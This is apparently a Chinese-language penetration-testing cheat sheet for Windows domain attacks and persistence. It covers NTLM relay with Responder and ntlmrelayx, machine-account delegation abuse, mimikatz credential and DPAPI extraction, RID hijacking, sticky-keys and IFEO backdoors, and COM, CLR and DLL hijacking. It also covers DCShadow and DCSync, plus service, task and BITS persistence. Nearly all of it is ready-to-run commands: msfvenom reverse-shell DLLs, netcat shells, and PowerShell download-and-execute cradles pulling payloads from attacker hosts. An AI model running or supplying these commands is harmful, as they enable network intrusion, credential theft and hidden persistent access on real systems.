当目标重启网络、访问浏览器、重启电脑时会把攻击机视为代理服务器,当目标通过攻击机代理服务器访问网络时,攻击机将会向目标发送代理的认证请求,并中继NTLM认证到LDAP服务器上,完成攻击。
这里要使用ldaps,因为域控会拒绝在不安全的连接中创建账户。
可以看到
已经成功添加了一个机器账户RFAYOVCC密码6YdX.NXqQGyuR7[
使用此机器账户申请票据
>python getST.py -spn cifs/sub2k8.zone.com zone.com/RFAYOVCC\$ -impersonate y
>export KRB5CCNAME=y.ccache
获取shell
>python smbexec.py -no-pass -k sub2k8.zone.com
dumphash、缓存hash
>python secretsdump.py -k -no-pass sub2k8.zone.com
当域控机器未启用LDAPS,并且已获得域普通用户权限时
使用powermad创建一个机器账户newcom
https://github.com/Kevin-Robertson/Powermad
>New-MachineAccount -MachineAccount newcom -Password $(ConvertTo-SecureString '123qwe!@#' -AsPlainText -Force)
或
>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --escalate-user newcom\$
后续正常操作即可。
内网存在java webdav时PROPPATCH、PROPFIND、 LOCK等请求方法接受XML作为输入时会形成xxe。攻击者要求采用NTLM认证方式是,webdav会自动使用当前用户的凭据认证。
使用ntlmrelayx监听
>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --escalate-user newcom\$
Burp发送xxe请求
PROPFIND /webdav HTTP/1.1
Host: 1.1.1.1
<?xml version"1.0" encoding="UFT-8"?>
<!DOCTYPE xxe [
<!ENTITY loot SYSTEM "http://10.1.1.101"> ]>
<D:xxe xmln:D="DAV:"><D:set><D:prop>
<a xmlns="http://xx.e">&loot;</a>
</D:prop></D:set></D:xxe>
内网中间人攻击脚本,kali内置
监听网络接口
>responder -I wlan0(eth0)
指定某台机器或网段:修改/etc/responder/Responder.py中RespondTo参数。
网段中有认证行为会捕获NTLMv2 hash
当访问一个不存在的共享时修改配置文件来解析
Xp
修改/usr/share/responder/servers/SMB.py定位到errorcode修改为\x71\x00\x00\xc0,删除掉/usr/share/responder/Responder.db
XP时使用\\cmd\share形式访问共享输入密码达4次会断开连接。
定位到
修改self.ntry != 10
Win7以上
修改/usr/share/responder/servers/SMB.py定位到##Session Setup 3
删除掉and GrabMessageID(data)[0:1] == "\x02",删除掉/usr/share/responder/Responder.db
修改后可以进行解析,捕获hash,否则会报错误64
>responder -I eth0 -v -F
F参数即可开启强制WPAD认证服务抓取 hash,访问IE或重启电脑即可发送欺骗认证获得hash。
重启也可以抓到
内网中使用文件包含漏洞和XSS
>Responder -I eth0 -v
http://10.1.1.1/file.php?file=\\10.1.1.12\share
http://10.1.1.1/xss.php?article=<img src=\\10.1.1.12\xx>
修改/etc/responder/Responder.conf文件,配置smb和http为Off,分别开启两个对话框,使用F参数启用WPAD欺骗浏览器,使用/usr/share/responder/tools中的MultiReplay.py进行中继攻击获得目标cmdshell。
>Responder -I eth0 -v -F
>python MultiReplay.py -t 192.168.0.115 -u ALL
使用hashcat破解 -m 5600为NTLMv2类型
>hashcat -m 5600 pass.txt wordlists.txt
域内机器可访问\\zone.com\SYSVOL\zone.com共享文件夹,翻看策略文件,查找groups.xml,ScheduledTasks\ScheduledTasks.xml,Printers\Printers.xml,Drives\Drives.xml,DataSources\DataSources.xml, Services\Services.xml等文件
使用powersploit脚本解密
使用msf的auxiliary/scanner/smb/smb_enum_gpp模块
>winrm quickconfig –q启动winrm
或PS>Enable-PSRemoting -Force
生成木马并启动监听
放入已获得权限的机器C盘中
内网另外机器中执行
>net use \\192.168.0.115\c$
>winrm invoke create wmicimv2/win32_process @{commandline="\\192.168.0.115\c\index.exe"}
>net user admin$ pass@123 /add /doamin
>net group "Domain admins" admin$ /add /domain
>ssh -i id_rsa user@192.168.0.110
位置
C:\Users\用户名\AppData\Local\Microsoft\Credentials
查看命令
>cmdkey /list
>mimikatz log
#dpapi::cred /in:C:\Users\administrator\AppData\Local\Microsoft\Credentials\D53BF8DC4D52D75463D46595907A4015
记录guidMasterKey: {572115f2-80b1-4b1e-be1b-425f5c7a8bfd}
#privilege::debug
#sekurlsa::dpapi
找到GUID为guidMasterKey的值下面的MasterKey: d928f5e02d2e9495f92bb…
#dpapi::cred /in:C:\Users\administrator\AppData\Local\Microsoft\Credentials\D53BF8DC4D52D75463D46595907A4015 /masterkey: d928f5e02d2e9495f92bb…
密码为CredentialBlob值。
>net user test$ test /add
>net localgroup administrators test$ /add
注册表HKEY_LOCAL_MACHINE\SAM\SAM\
给予administrator SAM的完全控制和读取的权限
以下导出为1.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\test$
记录HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\test$的默认类型000003EA
以下导出为2.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EA
默认administrator默认类型为000001F4
以下导出为3.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
把000001F4(3.reg)的F值粘贴到000003EA(2.reg)的F值
修改后导入
>regedit /s 1.reg
>regedit /s 2.reg
删除net user test$ /del
Powershell脚本
https://github.com/3gstudent/Windows-User-Clone/blob/master/Windows-User-Clone.ps1
需system权限
>Create-Clone -u 要创建的 -p 密码 -cu 想要克隆的
利用场景:
激活guest修改rid为管理员的
修改低权限用户rid
劫持rid之前普通用户1的rid值
使用msf的post/windows/manage/rid_hijack模块
运行后可以看到已经变为超管的rid值
此时普通用户1登录系统是为超管权限
激活来宾账户,修改其密码,加入administrators组
>net user guest /active:yes
>net user guest 123qwe!@#
>net localgroup administrators guest /ad
>move sethc.exe 1.exe
>copy cmd.exe sethc.exe
5下shift调用cmd
注册表
计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
新建Utilman.exe,新建字符串值Debugger,指定为C:\Windows\System32\cmd.exe
> REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe 新建DWORD值GlobalFlag 16进制为200
创建:计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe字符串值:MonitorProcess=muma.exe
DWORD值ReportingMode=1
>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v ReportingMode /t REG_DWORD /d 1 /f
>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\cmd.exe" /f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
添加一个监听
Meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
查询是否添加成功
Meterpreter> reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Meterpreter> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
开启防火墙进站规则
> netsh firewall add portopening TCP 444 "name" ENABLE ALL
重启
> shutdown -r -t 0
查看注册表启动项
>REG query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
添加启动项
>REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "windowsupdate" /t REG_SZ /F /D "c:\windows\temp\update.exe"
删除启动项
>REG delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "windowsupdate" /f
>schtasks /Create /tn 名字 /tr 运行程序 /sc hourly /mo 1
>schtasks /create /S TARGET /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.0.107:8080/Invoke-PowerShellTcp.ps1''')'"
创建计划任务
>schtasks /create /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\update.exe" /sc DAILY /mo 1 /ST 12:25 /RU SYSTEM
查看计划任务
>schtasks /query | findstr "windowsupdate"
立即执行某项计划任务
>schtasks /run /tn "windowsupdate"
删除某项计划任务
>schtasks /delete /F /tn "windowsupdate"
普通用户权限计划任务
>schtasks /create /F /tn "windowsupdate" /tr "D:\user\zhangsan\file\windowsupdate.exe" /sc DAILY /mo 1 /ST 12:25
>schtasks /query | findstr "windowsupdate"
>schtasks /run /tn "windowsupdate"
>schtasks /delete /F /tn "windowsupdate"
>schtasks /tn "SysDebug" /query /fo list /v
注册表HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\下新建AppCertDlls,新建名字为Default,值为c:\1.dll的项
#msfvenom –p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 –f dll >/root/1.dll
Msf>use exploit/multi/handler
Msf>set payload windows/meterpreter/reverse_tcp
https://cdn.securityxploded.com/download/RemoteDLLInjector.zip
> RemoteDLLInjector64.exe PID c:\1.dll
注册表HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Window\Appinit_Dlls下AppInit_DLLs设置为c:\1.dll,LoadAppInit_DLLs设置为1
Msf>use post/windows/manage/reflective_dll_inject
Msf>set session 1
Msf>set pid 1234
Msf>set path c:\\1.dll
Msf>run
&
migrate +pid
&
Meterpreter>run post/windows/manage/migrate
计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon下添加Userinit值
>Powershell.exe Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,c:\muma.exe"
计算机\HKEY_CURRENT_USER\Environment
创建键值UserInitMprLogonScript值为c:\muma.exe
&
Powershell实现:
>Set-ExecutionPolicy RemoteSigned
保存ps1执行
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,powershell.exe -nop -w hidden -c $w=new-object net.webclient;$w.proxy=[Net.WebRequest]::GetSystemWebProxy();$w.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $w.downloadstring('http://192.168.2.11:8080/kaMhC1');"
# powershell反弹shell的payload参照msf中的web_delivery模块
计算机\HKEY_CURRENT_USER\Control Panel\Desktop
SCRNSAVE.EXE - 默认屏幕保护程序,改为恶意程序(设置备份)
ScreenSaveActive - 1表示屏幕保护是启动状态,0表示表示屏幕保护是关闭状态
ScreenSaverTimeout - 指定屏幕保护程序启动前系统的空闲事件,单位为秒,默认为900(15分钟)
>git clone https://github.com/khr0x40sh/metasploit-modules.git
>mv metasploit-modules/persistence/mof_ps_persist.rb /usr/share/metasploit-framework/modules/post/windows/
>reload_all
>use post/windows/mof_ps_persist
>set payload windows/x64/meterpreter/reverse_tcp
>set lhost 192.168.0.108
>set lport 12345
>set session 1
>run
>use exploit/multi/handler
>set payload windows/x64/meterpreter/reverse_tcp
>set lhost 192.168.0.108
>set lport 12345
>set exitonsession false
重启后还会上线
清除后门,进入meterpreter,resource 生成的rc文件
停止MOF
>net stop winmgmt
删除文件夹:C:\WINDOWS\system32\wbem\Repository\
>net start winmgmt
WinRM端口5985,win2012以上默认启动,2008开启命令
>winrm quickconfig -q
2012启用端口复用
>winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
2008启用WinRM后修改端口为80
>winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}
后门连接和使用
本地开启WinRM并设置信任连接主机
>winrm quickconfig -q
>winrm set winrm/config/Client @{TrustedHosts="*"}
执行命令
>winrs -r:http://10.1.1.100 -u:administrator -p:password ipconfig /all
获取cmdshell
>winrs -r:http://10.1.1.100 -u:administrator -p:password cmd
只administrator允许远程登录WinRM,允许其他用户可以登录,执行注册表
>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
重启维持nc
>sc create ms binpath= "cmd /K start c:\nc\nc64.exe -d 192.168.0.51 4567 -e cmd.exe" start= delayed-auto error= ignore
重启维持psh
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=11111 -f psh-reflection >/var/www/html/xxx.ps1
>sc create ms binpath= "cmd /K start C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c \"IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/xxx.ps1')\"" start= delayed-auto error= ignore
重启维持Cobalt strike
配置监听器,生成web传递模块Powershell脚本
>sc create ms binpath= "cmd /K start C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.0.107:8080/a'))\"" start= delayed-auto error= ignore
Delay执行大概2分钟上线
>sc delete ms 卸载服务
Powershell
>powershell.exe new-service -Name nuoyani -BinaryPathName "C:\WINDOWS\Temp\360.exe" -StartupType Automatic
>$c2='new-';$c3='service -Name nuoyani -DisplayName OrderServ -BinaryPathName "C:\accc.exe" -StartupType Automatic'; $Text=$c2+$c3;IEX(-join $Text)
创建下载任务
>bitsadmin /create empire
下载的文件设置
>bitsadmin /addfile empire %comspec% c:\windows\temp\1.exe
设置传输时运行的命令,MSFvenom生成dll放入temp目录
>bitsadmin /SetNotifyCmdLine empire cmd.exe "cmd.exe /c rundll32 c:\windows\temp\1.dll,0"
(bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://x.com/shell.sct scrobj.dll")
启动任务
>bitsadmin /resume empire
列出所有用户的下载任务
>bitsadmin /list /allusers /verbose
重启后也会上线
完成任务
>bitsadmin /complete empire
>bitsadmin /cancel <Job> //删除某个任务
>bitsadmin /reset /allusers //删除所有任务
&
>bitsadmin /create mission
>bitsadmin /addfile mission %comspec% %temp%\cmd.exe
>bitsadmin.exe /SetNotifyCmdLine mission regsvr32.exe "/u /s /i:http://192.168.0.107/shell.sct scrobj.dll"
>bitsadmin /Resume mission
劫持调用.net程序,开机启动
https://github.com/3gstudent/CLR-Injection/blob/master/CLR-Injection_x64.bat
WMIC可替换为powershell
New-ItemProperty "HKCU:\Environment\" COR_ENABLE_PROFILING -value "1" -propertyType string | Out-Null
New-ItemProperty "HKCU:\Environment\" COR_PROFILER -value "{11111111-1111-1111-1111-111111111111}" -propertyType string | Out-Null
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"
wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll delete
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll delete
SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg_x64.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
SET KEY=HKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
添加全局变量
计算机\HKEY_CURRENT_USER\Environment
COR_ENABLE_PROFILING=1
COR_PROFILER={11111111-1111-1111-1111-111111111111}
注册CLSID
计算机\HKEY_CURRENT_USER\Software\Classes\CLSID添加项{11111111-1111-1111-1111-111111111111}和它的子项InprocServer32
新建一个键ThreadingModel,键值为:Apartment,默认键值为dll路径
劫持explorer.exe
>SET COR_ENABLE_PROFILING=1
>SET COR_PROFILER={11111111-1111-1111-1111-111111111111}
位置(新建)
HKEY_CURRENT_USER\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32默认值为恶意DLL
新建ThreadingModel值为Apartment
CAccPropServicesClass and MMDeviceEnumerato
无需超管权限,无需重启
https://github.com/3gstudent/COM-Object-hijacking
将恶意DLLbase64编码写入ps脚本
执行后会在
%appdata%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}目录释放2个文件,分别是x86和x64的dll
会在注册表中
HKEY_CURRENT_USER\Software\Classes\CLSID\
新建
{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}和子项默认指向恶意DLL
只要指向.net程序便可上线。如ie,mmc等
注册表位置:HKCU\Software\Classes\CLSID\
创建项{42aedc87-2188-41fd-b9a3-0c966feabec1}
创建子项InprocServer32
Default的键值为恶意dll的绝对路径:C:\test\1.dll
创建键值: ThreadingModel REG_SZ Apartment
HKCU\Software\Classes\CLSID{42aedc87-2188-41fd-b9a3-0c966feabec1}
HKCU\Software\Classes\CLSID{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKCU\Software\Classes\CLSID{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}
HKCU\Software\Classes\Wow6432Node\CLSID{BCDE0395-E52F-467C-8E3D-C4579291692E}
创建1.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Component"
progid="Component.WindowsUpdate"
version="1.00"
classid="{20002222-0000-0000-0000-000000000002}"
>
</registration>
<public>
<method name="exec">
</method>
</public>
<script language="JScript">
<![CDATA[
function exec(){
new ActiveXObject('WScript.Shell').Run('calc.exe');
}
]]>
</script>
</scriptlet>
创建COM对象
>regsvr32.exe /s /i:http://192.168.0.107/1.sct scrobj.dll
触发
>cscript 1.js
var test = new ActiveXObject("Component.TESTCB");
test.exec()
DLL劫持
注册表
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\ExcludeFromKnownDlls下添加 "lpk.dll"(若无,自己创建)
ExcludeFromKnownDlls可使KnownDLLs失效
需要重新启动电脑
查找可劫持的DLL:
1.启动程序
2.使用Process Explorer查看该应用程序启动后加载的DLL。
3.从已经加载的DLL列表中,查找在上述“KnownDLLs注册表项”中不存在的DLL。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs
4.编写第三步中获取到的DLL的劫持DLL。
5.将编写好的劫持DLL放到该应用程序目录下,重新启动该应用程序,检测是否劫持成功。
Explorer.exe启动调用winrar文件夹的RarExt.dll
Msf监听
复制dll文件到the-backdoor-factory文件夹中,加载恶意dll进原dll
>python backdoor.py -f RarExt.dll -s reverse_shell_tcp_inline -P 12138 -H 192.168.0.107 指定为kali监听的IP和端口
生成好的dll在backdoored文件夹,传入靶机中,替换原dll文件,最好把原dll保存备份。
每次打开windows资源管理器的时候,即可上线。重启可维持
使用
https://github.com/coca1ne/DLL_Hijacker
https://github.com/git20150901/DLLHijack_Detecter
查看要劫持的DLL的函数导出表,会直接生成cpp源码,重编译指向恶意代码
DLLHijack_Detecter可查看程序加载的不在KnownDLLs中的DLL
服务名称MSDTC,显示名称Distributed Transaction Coordinator
对应进程msdtc.exe,位于%windir%system32
C:\Windows\System32\wbem\
服务启动搜索注册表位置计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.51 LPORT=4444 -f dll -o /var/www/html/oci.dll
Oci.dll放入c:\windows\system32\
重启服务即可
>taskkill /f /im msdtc.exe
自动化查找可劫持的DLL
https://github.com/sensepost/rattler
使用
>Rattler_x64.exe calc.exe 1
会列出可被劫持的DLL
按程序读取DLL位置顺序,把恶意DLL放入程序同目录后,执行程序即可。
右键对应的注册表路径是
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers
使用autoruns查看加载的DLL
以rarext.dll为例
使用https://github.com/rek7/dll-hijacking创建代理DLL
注意修改parse.py中dumpbin.exe的位置
>python3 parse.py -d rarext.dll
修改原DLL为rarext_.dll,重新生成解决方案命名为rarext.dll
将两个DLL放入原目录,重启
function Invoke-ScheduledTaskComHandlerUserTask
{
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
Param (
[Parameter(Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$Command,
[Switch]
$Force
)
$ScheduledTaskCommandPath = "HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32"
if ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){
New-Item $ScheduledTaskCommandPath -Force |
New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
}else{
Write-Verbose "Key already exists, consider using -Force"
exit
}
if (Test-Path $ScheduledTaskCommandPath) {
Write-Verbose "Created registry entries to hijack the UserTask"
}else{
Write-Warning "Failed to create registry key, exiting"
exit
}
}
Invoke-ScheduledTaskComHandlerUserTask -Command "C:\test\testmsg.dll" -Verbose
重启权限可维持
生成DLL
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=6666 -f dll -o /var/www/html/x.dll
>use exploit/multi/handler
>set payload windows/x64/meterpreter/reverse_tcp
>Powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.105/powersploit/CodeExecution/Invoke-DllInjection.ps1'); Invoke-DllInjection -ProcessID pid -Dll .\1.dll"
InjectProc
生成DLL
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f dll -o /var/www/html/qq.dll
#use exploit/multi/handler
#set payload windows/x64/meterpreter/reverse_tcp
使用如下命令注入进程
>InjectProc.exe dll_inj qq.dll xx.exe(存在的进程)
添加到注册表中,只要运行control命令打开控制面板即可加载dll
编译为dll,这里是弹框测试
#include <Windows.h>
#include "pch.h"
//Cplapplet
extern "C" __declspec(dllexport) LONG Cplapplet(
HWND hwndCpl,
UINT msg,
LPARAM lParam1,
LPARAM lParam2
)
{
MessageBoxA(NULL, "inject control panel.", "Control Panel", 0);
return 1;
}
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
Cplapplet(NULL, NULL, NULL, NULL);
}
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs" /v spotless /d "C:\xxx\dll.dll" /f
低权限用户可指定.net应用程序使用自定义垃圾收集器(GC),一个自定义GC可以以COMPLUS_GCName此环境变量指定,只需将此环境变量指向到恶意DLL,自定义GC的DLL需要一个名为GC_VersionInfo的导出表。
下面是个弹框DLL
#include <Windows.h>
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
struct VersionInfo
{
UINT32 MajorVersion;
UINT32 MinorVersion;
UINT32 BuildVersion;
const char* Name;
};
extern "C" __declspec(dllexport) void GC_VersionInfo(VersionInfo * info)
{
info->BuildVersion = 0;
info->MinorVersion = 0;
info->BuildVersion = 0;
MessageBoxA(NULL, "giao", "giao", 0);
}
后执行任意.net程序可加载此DLL
当然也可以加载shellcode
https://github.com/am0nsec/MCGC
恶意DLL改名为fxsst.dll放置在c:\windows\目录即可实现对explorer.exe的劫持
>reg add HKLM\System\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2
允许DSRM账户远程访问
https://github.com/HarmJ0y/DAMP
效果:域内任何用户可读取域控hash
system权限执行
>psexec.exe -accepteula -s -i -d cmd.exe
域控制器执行
PS>Add-RemoteRegBackdoor -ComputerName 域控名 -Trustee 'S-1-1-0' –Verbose
域内机器执行
https://raw.githubusercontent.com/HarmJ0y/DAMP/master/RemoteHashRetrieval.ps1
PS> Get-RemoteLocalAccountHash -ComputerName 域控 –Verbose
域控上执行
>reg add HKLM\System\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2
PTH攻击,mimikatz需以管理员身份启动
>mimikatz "privilege::debug" "sekurlsa::pth /domain:dc /user:Administrator /ntlm:9f1770aebd442b6b624bdfe9cbc720dd" exit
http://192.168.0.107/ps/nishang/ActiveDirectory/Set-DCShadowPermissions.ps1
DCShadow攻击是通过更改AD架构,使域内一台机器伪造成域控。
此脚本可以通过修改AD对象提供DCShadow攻击的最小权限。
运行此脚本需要DA(Domain Administrator)权限,可以使指定用户不需要DA权限使用mimikatz。
域控:dc.zone.com
域内机器:sub2k8.zone.com
域内普通用户:y
域控执行
>Set-DCShadowPermissions -Fakedc sub2k8 -Object dc -username y –Verbose
注册sub2k8为假DC,给予用户y从sub2k8修改dc的计算机对象的权限。
在sub2k8上,以本地system权限启动一个mimikatz会话,以zone\y权限启动一个mimikatz会话。
System权限窗口执行dcshadow攻击,修改dc的计算机属性
Zone\y权限窗口用于推送
添加域管理
通过修改安全标识符,将域内普通用户y提升为域管理用户
>lsadump::dcshadow /object:y /attribute:primaryGroupID /value:512
Zone\y推送
>lsadump::dcshadow /push
此时在域控上查询可见y用户已经加入域管理组。
添加SIDHistory后门
记录域管理SID
>Set-DCShadowPermissions -FakeDC sub2k8 -Object y -Username y -Verbose
>lsadump::dcshadow /object:y /attribute:sidhistory /value:S-1-5-21-2346829310-1781191092-2540298887-500
推送
>lsadump::dcshadow /push
测试
域控中通过mimikatz命令可查询到SIDHistory
删除SIDHistory的方法
PS>Get-ADUser -Filter {name -eq "y"} –Properties sidhistory|foreach {Set-ADuser $_ –remove @{sidhistory="S-1-5-21-2346829310-1781191092-2540298887-500"}}
删除功能规则
输入的规则后面加参数-remove即可。
服务器管理器找到域->查看->启用高级功能->右键属性->安全->everyone完全控制
>mimikatz.exe "lsadump::dcsync /domain:zone.com /user:administrator" exit
或使用powerview添加一条ACL(域控执行)
>Add-DomainObjectAcl -TargetIdentity "DC=ZONE,DC=COM" -PrincipalIdentity 域内用户 -Rights DCSync -Verbose
使用此账户在域内任意主机可使用mimikatz的dcsync功能导出凭据
移除ACL
>Remove-DomainObjectAcl -TargetIdentity "DC=zone,DC=com" -PrincipalIdentity 用户 -Rights DCSync -Verbose
Netsh Helper DLL
https://github.com/outflanknl/NetshHelperBeacon
https://github.com/rtcrowley/Offensive-Netsh-Helper
生成DLL格式木马
传至靶机执行命令
>netsh add helper C:\Windows\Temp\help.dll
关闭netsh权限不会掉,调用的powershell
#use exploit/multi/script/web_delivery
>set target 2 #PSH
>set payload windows/x64/meterpreter/reverse_tcp
>set lhost 192.168.0.107
>set lport 12345
Visual Studio新建空白DLL项目,源文件添加现有文件
https://github.com/rtcrowley/Offensive-Netsh-Helper/blob/master/netshlep.cpp
复制生成的代码进文件中,配置管理器新建x64位数后生成解决方案,配置类型选择位动态库复制DLL到靶机执行
>netsh add helper helper.dll
关闭netsh后权限会掉
https://github.com/outflanknl/NetshHelperBeacon
MSFvenom生成.c格式
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f c -o /var/www/html/1.c
Visual Studio打开项目
若系统是64位需设置配置管理器为64位项目,反之32(解决方案右键属性)
将MSF生成shellcode粘贴进相应位置后生成解决方案。
会在项目目录x64/Release下生成dll
复制DLL到靶机system32目录下,执行命令
>netsh add helper C:\Windows\System32\NetshHelperBeacon.dll
只要启动netsh就会触发
注册表自启动
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/PowerUpSQL.ps1');Get-SQLPersistRegRun -Verbose -Name Update -Command 'c:\windows\temp\Update.exe' -Instance "zone.com\sub2k8""
重启MSSQL上线(需重启服务)
http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1
>powershell -ep bypass
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1')
>Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "zone.com\sub2k8" -PsCommand "IEX(new-object net.webclient).downloadstring('http://192.168.0.107/xxxx')" 远程木马脚本可用CS/Empire生成
>net stop mssqlserver
>net start mssqlserver
映像劫持
>powershell -nop -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/PowerUpSQL.ps1');Get-SQLPersistRegDebugger -Verbose -FileName sethc.exe -Command "c:\windows\system32\cmd.exe" -Instance "zone.com\sub2k8""
